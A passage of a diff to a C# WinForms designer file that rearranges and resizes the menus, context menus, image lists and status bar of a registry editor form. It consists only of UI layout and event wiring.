"modifyToolStripMenuItem1"; - this.modifyToolStripMenuItem1.Size = new System.Drawing.Size(184, 22); - this.modifyToolStripMenuItem1.Text = "Modify..."; - this.modifyToolStripMenuItem1.Visible = false; - this.modifyToolStripMenuItem1.Click += new System.EventHandler(this.modifyRegistryValue_Click); - // - // modifyBinaryDataToolStripMenuItem1 - // - this.modifyBinaryDataToolStripMenuItem1.Enabled = false; - this.modifyBinaryDataToolStripMenuItem1.Name = "modifyBinaryDataToolStripMenuItem1"; - this.modifyBinaryDataToolStripMenuItem1.Size = new System.Drawing.Size(184, 22); - this.modifyBinaryDataToolStripMenuItem1.Text = "Modify Binary Data..."; - this.modifyBinaryDataToolStripMenuItem1.Visible = false; - this.modifyBinaryDataToolStripMenuItem1.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click); - // - // modifyNewtoolStripSeparator - // - this.modifyNewtoolStripSeparator.Name = "modifyNewtoolStripSeparator"; - this.modifyNewtoolStripSeparator.Size = new System.Drawing.Size(181, 6); - this.modifyNewtoolStripSeparator.Visible = false; - // - // newToolStripMenuItem2 - // - this.newToolStripMenuItem2.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.keyToolStripMenuItem2, - this.toolStripSeparator7, - this.stringValueToolStripMenuItem2, - this.binaryValueToolStripMenuItem2, - this.dWORD32bitValueToolStripMenuItem2, - this.qWORD64bitValueToolStripMenuItem2, - this.multiStringValueToolStripMenuItem2, - this.expandableStringValueToolStripMenuItem2}); - this.newToolStripMenuItem2.Name = "newToolStripMenuItem2"; - this.newToolStripMenuItem2.Size = new System.Drawing.Size(184, 22); - this.newToolStripMenuItem2.Text = "New"; - // - // keyToolStripMenuItem2 - // - this.keyToolStripMenuItem2.Name = "keyToolStripMenuItem2"; - this.keyToolStripMenuItem2.Size = new System.Drawing.Size(199, 22); - this.keyToolStripMenuItem2.Text = "Key"; - this.keyToolStripMenuItem2.Click += new System.EventHandler(this.createNewRegistryKey_Click); - // - // toolStripSeparator7 - // - this.toolStripSeparator7.Name = "toolStripSeparator7"; - this.toolStripSeparator7.Size = new System.Drawing.Size(196, 6); - // - // stringValueToolStripMenuItem2 - // - this.stringValueToolStripMenuItem2.Name = "stringValueToolStripMenuItem2"; - this.stringValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22); - this.stringValueToolStripMenuItem2.Text = "String Value"; - this.stringValueToolStripMenuItem2.Click += new System.EventHandler(this.createStringRegistryValue_Click); - // - // binaryValueToolStripMenuItem2 - // - this.binaryValueToolStripMenuItem2.Name = "binaryValueToolStripMenuItem2"; - this.binaryValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22); - this.binaryValueToolStripMenuItem2.Text = "Binary Value"; - this.binaryValueToolStripMenuItem2.Click += new System.EventHandler(this.createBinaryRegistryValue_Click); - // - // dWORD32bitValueToolStripMenuItem2 - // - this.dWORD32bitValueToolStripMenuItem2.Name = "dWORD32bitValueToolStripMenuItem2"; - this.dWORD32bitValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22); - this.dWORD32bitValueToolStripMenuItem2.Text = "DWORD (32-bit) Value"; - this.dWORD32bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createDwordRegistryValue_Click); - // - // qWORD64bitValueToolStripMenuItem2 - // - this.qWORD64bitValueToolStripMenuItem2.Name = "qWORD64bitValueToolStripMenuItem2"; - this.qWORD64bitValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22); - this.qWORD64bitValueToolStripMenuItem2.Text = "QWORD (64-bit) Value"; - this.qWORD64bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createQwordRegistryValue_Click); - // - // multiStringValueToolStripMenuItem2 - // - this.multiStringValueToolStripMenuItem2.Name = "multiStringValueToolStripMenuItem2"; - this.multiStringValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22); - this.multiStringValueToolStripMenuItem2.Text = "Multi-String Value"; - this.multiStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click); - // - // expandableStringValueToolStripMenuItem2 - // - this.expandableStringValueToolStripMenuItem2.Name = "expandableStringValueToolStripMenuItem2"; - this.expandableStringValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22); - this.expandableStringValueToolStripMenuItem2.Text = "Expandable String Value"; - this.expandableStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click); - // - // toolStripSeparator6 - // - this.toolStripSeparator6.Name = "toolStripSeparator6"; - this.toolStripSeparator6.Size = new System.Drawing.Size(181, 6); - // - // deleteToolStripMenuItem2 - // - this.deleteToolStripMenuItem2.Enabled = false; - this.deleteToolStripMenuItem2.Name = "deleteToolStripMenuItem2"; - this.deleteToolStripMenuItem2.ShortcutKeyDisplayString = "Del"; - this.deleteToolStripMenuItem2.Size = new System.Drawing.Size(184, 22); - this.deleteToolStripMenuItem2.Text = "Delete"; - this.deleteToolStripMenuItem2.Click += new System.EventHandler(this.menuStripDelete_Click); - // - // renameToolStripMenuItem2 - // - this.renameToolStripMenuItem2.Enabled = false; - this.renameToolStripMenuItem2.Name = "renameToolStripMenuItem2"; - this.renameToolStripMenuItem2.Size = new System.Drawing.Size(184, 22); - this.renameToolStripMenuItem2.Text = "Rename"; - this.renameToolStripMenuItem2.Click += new System.EventHandler(this.menuStripRename_Click); - // - // tv_ContextMenuStrip - // - this.tv_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.newToolStripMenuItem, - this.toolStripSeparator1, - this.deleteToolStripMenuItem, - this.renameToolStripMenuItem}); - this.tv_ContextMenuStrip.Name = "contextMenuStrip"; - this.tv_ContextMenuStrip.Size = new System.Drawing.Size(118, 76); - // - // newToolStripMenuItem - // - this.newToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.keyToolStripMenuItem, - this.toolStripSeparator2, - this.stringValueToolStripMenuItem, - this.binaryValueToolStripMenuItem, - this.dWORD32bitValueToolStripMenuItem, - this.qWORD64bitValueToolStripMenuItem, - this.multiStringValueToolStripMenuItem, - this.expandableStringValueToolStripMenuItem}); - this.newToolStripMenuItem.Name = "newToolStripMenuItem"; - this.newToolStripMenuItem.Size = new System.Drawing.Size(117, 22); - this.newToolStripMenuItem.Text = "New"; - // - // keyToolStripMenuItem - // - this.keyToolStripMenuItem.Name = "keyToolStripMenuItem"; - this.keyToolStripMenuItem.Size = new System.Drawing.Size(199, 22); - this.keyToolStripMenuItem.Text = "Key"; - this.keyToolStripMenuItem.Click += new System.EventHandler(this.createNewRegistryKey_Click); - // - // toolStripSeparator2 - // - this.toolStripSeparator2.Name = "toolStripSeparator2"; - this.toolStripSeparator2.Size = new System.Drawing.Size(196, 6); - // - // stringValueToolStripMenuItem - // - this.stringValueToolStripMenuItem.Name = "stringValueToolStripMenuItem"; - this.stringValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22); - this.stringValueToolStripMenuItem.Text = "String Value"; - this.stringValueToolStripMenuItem.Click += new System.EventHandler(this.createStringRegistryValue_Click); - // - // binaryValueToolStripMenuItem - // - this.binaryValueToolStripMenuItem.Name = "binaryValueToolStripMenuItem"; - this.binaryValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22); - this.binaryValueToolStripMenuItem.Text = "Binary Value"; - this.binaryValueToolStripMenuItem.Click += new System.EventHandler(this.createBinaryRegistryValue_Click); - // - // dWORD32bitValueToolStripMenuItem - // - this.dWORD32bitValueToolStripMenuItem.Name = "dWORD32bitValueToolStripMenuItem"; - this.dWORD32bitValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22); - this.dWORD32bitValueToolStripMenuItem.Text = "DWORD (32-bit) Value"; - this.dWORD32bitValueToolStripMenuItem.Click += new System.EventHandler(this.createDwordRegistryValue_Click); - // - // qWORD64bitValueToolStripMenuItem - // - this.qWORD64bitValueToolStripMenuItem.Name = "qWORD64bitValueToolStripMenuItem"; - this.qWORD64bitValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22); - this.qWORD64bitValueToolStripMenuItem.Text = "QWORD (64-bit) Value"; - this.qWORD64bitValueToolStripMenuItem.Click += new System.EventHandler(this.createQwordRegistryValue_Click); - // - // multiStringValueToolStripMenuItem - // - this.multiStringValueToolStripMenuItem.Name = "multiStringValueToolStripMenuItem"; - this.multiStringValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22); - this.multiStringValueToolStripMenuItem.Text = "Multi-String Value"; - this.multiStringValueToolStripMenuItem.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click); - // - // expandableStringValueToolStripMenuItem - // - this.expandableStringValueToolStripMenuItem.Name = "expandableStringValueToolStripMenuItem"; - this.expandableStringValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22); - this.expandableStringValueToolStripMenuItem.Text = "Expandable String Value"; - this.expandableStringValueToolStripMenuItem.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click); - // - // toolStripSeparator1 - // - this.toolStripSeparator1.Name = "toolStripSeparator1"; - this.toolStripSeparator1.Size = new System.Drawing.Size(114, 6); - // - // deleteToolStripMenuItem - // - this.deleteToolStripMenuItem.Enabled = false; - this.deleteToolStripMenuItem.Name = "deleteToolStripMenuItem"; - this.deleteToolStripMenuItem.Size = new System.Drawing.Size(117, 22); - this.deleteToolStripMenuItem.Text = "Delete"; - this.deleteToolStripMenuItem.Click += new System.EventHandler(this.deleteRegistryKey_Click); - // - // renameToolStripMenuItem - // - this.renameToolStripMenuItem.Enabled = false; - this.renameToolStripMenuItem.Name = "renameToolStripMenuItem"; - this.renameToolStripMenuItem.Size = new System.Drawing.Size(117, 22); - this.renameToolStripMenuItem.Text = "Rename"; - this.renameToolStripMenuItem.Click += new System.EventHandler(this.renameRegistryKey_Click); - // - // selectedItem_ContextMenuStrip - // - this.selectedItem_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.modifyToolStripMenuItem, - this.modifyBinaryDataToolStripMenuItem, - this.modifyToolStripSeparator1, - this.deleteToolStripMenuItem1, - this.renameToolStripMenuItem1}); - this.selectedItem_ContextMenuStrip.Name = "selectedItem_ContextMenuStrip"; - this.selectedItem_ContextMenuStrip.Size = new System.Drawing.Size(185, 98); - // - // modifyToolStripMenuItem - // - this.modifyToolStripMenuItem.Enabled = false; - this.modifyToolStripMenuItem.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); - this.modifyToolStripMenuItem.Name = "modifyToolStripMenuItem"; - this.modifyToolStripMenuItem.Size = new System.Drawing.Size(184, 22); - this.modifyToolStripMenuItem.Text = "Modify..."; - this.modifyToolStripMenuItem.Click += new System.EventHandler(this.modifyRegistryValue_Click); - // - // modifyBinaryDataToolStripMenuItem - // - this.modifyBinaryDataToolStripMenuItem.Enabled = false; - this.modifyBinaryDataToolStripMenuItem.Name = "modifyBinaryDataToolStripMenuItem"; - this.modifyBinaryDataToolStripMenuItem.Size = new System.Drawing.Size(184, 22); - this.modifyBinaryDataToolStripMenuItem.Text = "Modify Binary Data..."; - this.modifyBinaryDataToolStripMenuItem.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click); - // - // modifyToolStripSeparator1 - // - this.modifyToolStripSeparator1.Name = "modifyToolStripSeparator1"; - this.modifyToolStripSeparator1.Size = new System.Drawing.Size(181, 6); - // - // deleteToolStripMenuItem1 - // - this.deleteToolStripMenuItem1.Name = "deleteToolStripMenuItem1"; - this.deleteToolStripMenuItem1.Size = new System.Drawing.Size(184, 22); - this.deleteToolStripMenuItem1.Text = "Delete"; - this.deleteToolStripMenuItem1.Click += new System.EventHandler(this.deleteRegistryValue_Click); - // - // renameToolStripMenuItem1 - // - this.renameToolStripMenuItem1.Name = "renameToolStripMenuItem1"; - this.renameToolStripMenuItem1.Size = new System.Drawing.Size(184, 22); - this.renameToolStripMenuItem1.Text = "Rename"; - this.renameToolStripMenuItem1.Click += new System.EventHandler(this.renameRegistryValue_Click); - // - // lst_ContextMenuStrip - // - this.lst_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.newToolStripMenuItem1}); - this.lst_ContextMenuStrip.Name = "lst_ContextMenuStrip"; - this.lst_ContextMenuStrip.Size = new System.Drawing.Size(99, 26); - // - // newToolStripMenuItem1 - // - this.newToolStripMenuItem1.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { - this.keyToolStripMenuItem1, - this.toolStripSeparator4, - this.stringValueToolStripMenuItem1, - this.binaryValueToolStripMenuItem1, - this.dWORD32bitValueToolStripMenuItem1, - this.qWORD64bitValueToolStripMenuItem1, - this.multiStringValueToolStripMenuItem1, - this.expandableStringValueToolStripMenuItem1}); - this.newToolStripMenuItem1.Name = "newToolStripMenuItem1"; - this.newToolStripMenuItem1.Size = new System.Drawing.Size(98, 22); - this.newToolStripMenuItem1.Text = "New"; - // - // keyToolStripMenuItem1 - // - this.keyToolStripMenuItem1.Name = "keyToolStripMenuItem1"; - this.keyToolStripMenuItem1.Size = new System.Drawing.Size(199, 22); - this.keyToolStripMenuItem1.Text = "Key"; - this.keyToolStripMenuItem1.Click += new System.EventHandler(this.createNewRegistryKey_Click); - // - // toolStripSeparator4 - // - this.toolStripSeparator4.Name = "toolStripSeparator4"; - this.toolStripSeparator4.Size = new System.Drawing.Size(196, 6); - // - // stringValueToolStripMenuItem1 - // - this.stringValueToolStripMenuItem1.Name = "stringValueToolStripMenuItem1"; - this.stringValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22); - this.stringValueToolStripMenuItem1.Text = "String Value"; - this.stringValueToolStripMenuItem1.Click += new System.EventHandler(this.createStringRegistryValue_Click); - // - // binaryValueToolStripMenuItem1 - // - this.binaryValueToolStripMenuItem1.Name = "binaryValueToolStripMenuItem1"; - this.binaryValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22); - this.binaryValueToolStripMenuItem1.Text = "Binary Value"; - this.binaryValueToolStripMenuItem1.Click += new System.EventHandler(this.createBinaryRegistryValue_Click); - // - // dWORD32bitValueToolStripMenuItem1 - // - this.dWORD32bitValueToolStripMenuItem1.Name = "dWORD32bitValueToolStripMenuItem1"; - this.dWORD32bitValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22); - this.dWORD32bitValueToolStripMenuItem1.Text = "DWORD (32-bit) Value"; - this.dWORD32bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createDwordRegistryValue_Click); - // - // qWORD64bitValueToolStripMenuItem1 - // - this.qWORD64bitValueToolStripMenuItem1.Name = "qWORD64bitValueToolStripMenuItem1"; - this.qWORD64bitValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22); - this.qWORD64bitValueToolStripMenuItem1.Text = "QWORD (64-bit) Value"; - this.qWORD64bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createQwordRegistryValue_Click); - // - // multiStringValueToolStripMenuItem1 - // - this.multiStringValueToolStripMenuItem1.Name = "multiStringValueToolStripMenuItem1"; - this.multiStringValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22); - this.multiStringValueToolStripMenuItem1.Text = "Multi-String Value"; - this.multiStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click); - // - // expandableStringValueToolStripMenuItem1 - // - this.expandableStringValueToolStripMenuItem1.Name = "expandableStringValueToolStripMenuItem1"; - this.expandableStringValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22); - this.expandableStringValueToolStripMenuItem1.Text = "Expandable String Value"; - this.expandableStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click); - // // tvRegistryDirectory // this.tvRegistryDirectory.Dock = System.Windows.Forms.DockStyle.Fill; @@ -564,6 +156,12 @@ namespace Server.Forms this.tvRegistryDirectory.NodeMouseClick += new System.Windows.Forms.TreeNodeMouseClickEventHandler(this.tvRegistryDirectory_NodeMouseClick); this.tvRegistryDirectory.KeyUp += new System.Windows.Forms.KeyEventHandler(this.tvRegistryDirectory_KeyUp); // + // imageRegistryDirectoryList + // + this.imageRegistryDirectoryList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryDirectoryList.ImageStream"))); + this.imageRegistryDirectoryList.TransparentColor = System.Drawing.Color.Transparent; + this.imageRegistryDirectoryList.Images.SetKeyName(0, "folder.png"); + // // lstRegistryValues // this.lstRegistryValues.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { @@ -600,7 +198,414 @@ namespace Server.Forms this.hValue.Text = "Value"; this.hValue.Width = 214; // - // FrmRegistryEditor + // imageRegistryKeyTypeList + // + this.imageRegistryKeyTypeList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryKeyTypeList.ImageStream"))); + this.imageRegistryKeyTypeList.TransparentColor = System.Drawing.Color.Transparent; + this.imageRegistryKeyTypeList.Images.SetKeyName(0, "reg_string.png"); + this.imageRegistryKeyTypeList.Images.SetKeyName(1, "reg_binary.png"); + // + // statusStrip + // + this.statusStrip.Dock = System.Windows.Forms.DockStyle.Fill; + this.statusStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.selectedStripStatusLabel}); + this.statusStrip.Location = new System.Drawing.Point(0, 539); + this.statusStrip.Name = "statusStrip"; + this.statusStrip.Size = new System.Drawing.Size(784, 22); + this.statusStrip.TabIndex = 1; + this.statusStrip.Text = "statusStrip"; + // + // selectedStripStatusLabel + // + this.selectedStripStatusLabel.Name = "selectedStripStatusLabel"; + this.selectedStripStatusLabel.Size = new System.Drawing.Size(0, 17); + // + // menuStrip + // + this.menuStrip.Dock = System.Windows.Forms.DockStyle.None; + this.menuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.fileToolStripMenuItem, + this.editToolStripMenuItem}); + this.menuStrip.Location = new System.Drawing.Point(0, 0); + this.menuStrip.Name = "menuStrip"; + this.menuStrip.Size = new System.Drawing.Size(89, 25); + this.menuStrip.TabIndex = 2; + // + // fileToolStripMenuItem + // + this.fileToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.exitToolStripMenuItem}); + this.fileToolStripMenuItem.Name = "fileToolStripMenuItem"; + this.fileToolStripMenuItem.Size = new System.Drawing.Size(39, 21); + this.fileToolStripMenuItem.Text = "File"; + // + // exitToolStripMenuItem + // + this.exitToolStripMenuItem.Name = "exitToolStripMenuItem"; + this.exitToolStripMenuItem.Size = new System.Drawing.Size(96, 22); + this.exitToolStripMenuItem.Text = "Exit"; + this.exitToolStripMenuItem.Click += new System.EventHandler(this.menuStripExit_Click); + // + // editToolStripMenuItem + // + this.editToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.modifyToolStripMenuItem1, + this.modifyBinaryDataToolStripMenuItem1, + this.modifyNewtoolStripSeparator, + this.newToolStripMenuItem2, + this.toolStripSeparator6, + this.deleteToolStripMenuItem2, + this.renameToolStripMenuItem2}); + this.editToolStripMenuItem.Name = "editToolStripMenuItem"; + this.editToolStripMenuItem.Size = new System.Drawing.Size(42, 21); + this.editToolStripMenuItem.Text = "Edit"; + this.editToolStripMenuItem.DropDownOpening += new System.EventHandler(this.editToolStripMenuItem_DropDownOpening); + // + // modifyToolStripMenuItem1 + // + this.modifyToolStripMenuItem1.Enabled = false; + this.modifyToolStripMenuItem1.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.modifyToolStripMenuItem1.Name = "modifyToolStripMenuItem1"; + this.modifyToolStripMenuItem1.Size = new System.Drawing.Size(197, 22); + this.modifyToolStripMenuItem1.Text = "Modify..."; + this.modifyToolStripMenuItem1.Visible = false; + this.modifyToolStripMenuItem1.Click += new System.EventHandler(this.modifyRegistryValue_Click); + // + // modifyBinaryDataToolStripMenuItem1 + // + this.modifyBinaryDataToolStripMenuItem1.Enabled = false; + this.modifyBinaryDataToolStripMenuItem1.Name = "modifyBinaryDataToolStripMenuItem1"; + this.modifyBinaryDataToolStripMenuItem1.Size = new System.Drawing.Size(197, 22); + this.modifyBinaryDataToolStripMenuItem1.Text = "Modify Binary Data..."; + this.modifyBinaryDataToolStripMenuItem1.Visible = false; + this.modifyBinaryDataToolStripMenuItem1.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click); + // + // modifyNewtoolStripSeparator + // + this.modifyNewtoolStripSeparator.Name = "modifyNewtoolStripSeparator"; + this.modifyNewtoolStripSeparator.Size = new System.Drawing.Size(194, 6); + this.modifyNewtoolStripSeparator.Visible = false; + // + // newToolStripMenuItem2 + // + this.newToolStripMenuItem2.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.keyToolStripMenuItem2, + this.toolStripSeparator7, + this.stringValueToolStripMenuItem2, + this.binaryValueToolStripMenuItem2, + this.dWORD32bitValueToolStripMenuItem2, + this.qWORD64bitValueToolStripMenuItem2, + this.multiStringValueToolStripMenuItem2, + this.expandableStringValueToolStripMenuItem2}); + this.newToolStripMenuItem2.Name = "newToolStripMenuItem2"; + this.newToolStripMenuItem2.Size = new System.Drawing.Size(197, 22); + this.newToolStripMenuItem2.Text = "New"; + // + // keyToolStripMenuItem2 + // + this.keyToolStripMenuItem2.Name = "keyToolStripMenuItem2"; + this.keyToolStripMenuItem2.Size = new System.Drawing.Size(218, 22); + this.keyToolStripMenuItem2.Text = "Key"; + this.keyToolStripMenuItem2.Click += new System.EventHandler(this.createNewRegistryKey_Click); + // + // toolStripSeparator7 + // + this.toolStripSeparator7.Name = "toolStripSeparator7"; + this.toolStripSeparator7.Size = new System.Drawing.Size(215, 6); + // + // stringValueToolStripMenuItem2 + // + this.stringValueToolStripMenuItem2.Name = "stringValueToolStripMenuItem2"; + this.stringValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22); + this.stringValueToolStripMenuItem2.Text = "String Value"; + this.stringValueToolStripMenuItem2.Click += new System.EventHandler(this.createStringRegistryValue_Click); + // + // binaryValueToolStripMenuItem2 + // + this.binaryValueToolStripMenuItem2.Name = "binaryValueToolStripMenuItem2"; + this.binaryValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22); + this.binaryValueToolStripMenuItem2.Text = "Binary Value"; + this.binaryValueToolStripMenuItem2.Click += new System.EventHandler(this.createBinaryRegistryValue_Click); + // + // dWORD32bitValueToolStripMenuItem2 + // + this.dWORD32bitValueToolStripMenuItem2.Name = "dWORD32bitValueToolStripMenuItem2"; + this.dWORD32bitValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22); + this.dWORD32bitValueToolStripMenuItem2.Text = "DWORD (32-bit) Value"; + this.dWORD32bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createDwordRegistryValue_Click); + // + // qWORD64bitValueToolStripMenuItem2 + // + this.qWORD64bitValueToolStripMenuItem2.Name = "qWORD64bitValueToolStripMenuItem2"; + this.qWORD64bitValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22); + this.qWORD64bitValueToolStripMenuItem2.Text = "QWORD (64-bit) Value"; + this.qWORD64bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createQwordRegistryValue_Click); + // + // multiStringValueToolStripMenuItem2 + // + this.multiStringValueToolStripMenuItem2.Name = "multiStringValueToolStripMenuItem2"; + this.multiStringValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22); + this.multiStringValueToolStripMenuItem2.Text = "Multi-String Value"; + this.multiStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click); + // + // expandableStringValueToolStripMenuItem2 + // + this.expandableStringValueToolStripMenuItem2.Name = "expandableStringValueToolStripMenuItem2"; + this.expandableStringValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22); + this.expandableStringValueToolStripMenuItem2.Text = "Expandable String Value"; + this.expandableStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click); + // + // toolStripSeparator6 + // + this.toolStripSeparator6.Name = "toolStripSeparator6"; + this.toolStripSeparator6.Size = new System.Drawing.Size(194, 6); + // + // deleteToolStripMenuItem2 + // + this.deleteToolStripMenuItem2.Enabled = false; + this.deleteToolStripMenuItem2.Name = "deleteToolStripMenuItem2"; + this.deleteToolStripMenuItem2.ShortcutKeyDisplayString = "Del"; + this.deleteToolStripMenuItem2.Size = new System.Drawing.Size(197, 22); + this.deleteToolStripMenuItem2.Text = "Delete"; + this.deleteToolStripMenuItem2.Click += new System.EventHandler(this.menuStripDelete_Click); + // + // renameToolStripMenuItem2 + // + this.renameToolStripMenuItem2.Enabled = false; + this.renameToolStripMenuItem2.Name = "renameToolStripMenuItem2"; + this.renameToolStripMenuItem2.Size = new System.Drawing.Size(197, 22); + this.renameToolStripMenuItem2.Text = "Rename"; + this.renameToolStripMenuItem2.Click += new System.EventHandler(this.menuStripRename_Click); + // + // tv_ContextMenuStrip + // + this.tv_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.newToolStripMenuItem, + this.toolStripSeparator1, + this.deleteToolStripMenuItem, + this.renameToolStripMenuItem}); + this.tv_ContextMenuStrip.Name = "contextMenuStrip"; + this.tv_ContextMenuStrip.Size = new System.Drawing.Size(124, 76); + // + // newToolStripMenuItem + // + this.newToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.keyToolStripMenuItem, + this.toolStripSeparator2, + this.stringValueToolStripMenuItem, + this.binaryValueToolStripMenuItem, + this.dWORD32bitValueToolStripMenuItem, + this.qWORD64bitValueToolStripMenuItem, + this.multiStringValueToolStripMenuItem, + this.expandableStringValueToolStripMenuItem}); + this.newToolStripMenuItem.Name = "newToolStripMenuItem"; + this.newToolStripMenuItem.Size = new System.Drawing.Size(123, 22); + this.newToolStripMenuItem.Text = "New"; + // + // keyToolStripMenuItem + // + this.keyToolStripMenuItem.Name = "keyToolStripMenuItem"; + this.keyToolStripMenuItem.Size = new System.Drawing.Size(218, 22); + this.keyToolStripMenuItem.Text = "Key"; + this.keyToolStripMenuItem.Click += new System.EventHandler(this.createNewRegistryKey_Click); + // + // toolStripSeparator2 + // + this.toolStripSeparator2.Name = "toolStripSeparator2"; + this.toolStripSeparator2.Size = new System.Drawing.Size(215, 6); + // + // stringValueToolStripMenuItem + // + this.stringValueToolStripMenuItem.Name = "stringValueToolStripMenuItem"; + this.stringValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22); + this.stringValueToolStripMenuItem.Text = "String Value"; + this.stringValueToolStripMenuItem.Click += new System.EventHandler(this.createStringRegistryValue_Click); + // + // binaryValueToolStripMenuItem + // + this.binaryValueToolStripMenuItem.Name = "binaryValueToolStripMenuItem"; + this.binaryValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22); + this.binaryValueToolStripMenuItem.Text = "Binary Value"; + this.binaryValueToolStripMenuItem.Click += new System.EventHandler(this.createBinaryRegistryValue_Click); + // + // dWORD32bitValueToolStripMenuItem + // + this.dWORD32bitValueToolStripMenuItem.Name = "dWORD32bitValueToolStripMenuItem"; + this.dWORD32bitValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22); + this.dWORD32bitValueToolStripMenuItem.Text = "DWORD (32-bit) Value"; + this.dWORD32bitValueToolStripMenuItem.Click += new System.EventHandler(this.createDwordRegistryValue_Click); + // + // qWORD64bitValueToolStripMenuItem + // + this.qWORD64bitValueToolStripMenuItem.Name = "qWORD64bitValueToolStripMenuItem"; + this.qWORD64bitValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22); + this.qWORD64bitValueToolStripMenuItem.Text = "QWORD (64-bit) Value"; + this.qWORD64bitValueToolStripMenuItem.Click += new System.EventHandler(this.createQwordRegistryValue_Click); + // + // multiStringValueToolStripMenuItem + // + this.multiStringValueToolStripMenuItem.Name = "multiStringValueToolStripMenuItem"; + this.multiStringValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22); + this.multiStringValueToolStripMenuItem.Text = "Multi-String Value"; + this.multiStringValueToolStripMenuItem.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click); + // + // expandableStringValueToolStripMenuItem + // + this.expandableStringValueToolStripMenuItem.Name = "expandableStringValueToolStripMenuItem"; + this.expandableStringValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22); + this.expandableStringValueToolStripMenuItem.Text = "Expandable String Value"; + this.expandableStringValueToolStripMenuItem.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click); + // + // toolStripSeparator1 + // + this.toolStripSeparator1.Name = "toolStripSeparator1"; + this.toolStripSeparator1.Size = new System.Drawing.Size(120, 6); + // + // deleteToolStripMenuItem + // + this.deleteToolStripMenuItem.Enabled = false; + this.deleteToolStripMenuItem.Name = "deleteToolStripMenuItem"; + this.deleteToolStripMenuItem.Size = new System.Drawing.Size(123, 22); + this.deleteToolStripMenuItem.Text = "Delete"; + this.deleteToolStripMenuItem.Click += new System.EventHandler(this.deleteRegistryKey_Click); + // + // renameToolStripMenuItem + // + this.renameToolStripMenuItem.Enabled = false; + this.renameToolStripMenuItem.Name = "renameToolStripMenuItem"; + this.renameToolStripMenuItem.Size = new System.Drawing.Size(123, 22); + this.renameToolStripMenuItem.Text = "Rename"; + this.renameToolStripMenuItem.Click += new System.EventHandler(this.renameRegistryKey_Click); + // + // selectedItem_ContextMenuStrip + // + this.selectedItem_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.modifyToolStripMenuItem, + this.modifyBinaryDataToolStripMenuItem, + this.modifyToolStripSeparator1, + this.deleteToolStripMenuItem1, + this.renameToolStripMenuItem1}); + this.selectedItem_ContextMenuStrip.Name = "selectedItem_ContextMenuStrip"; + this.selectedItem_ContextMenuStrip.Size = new 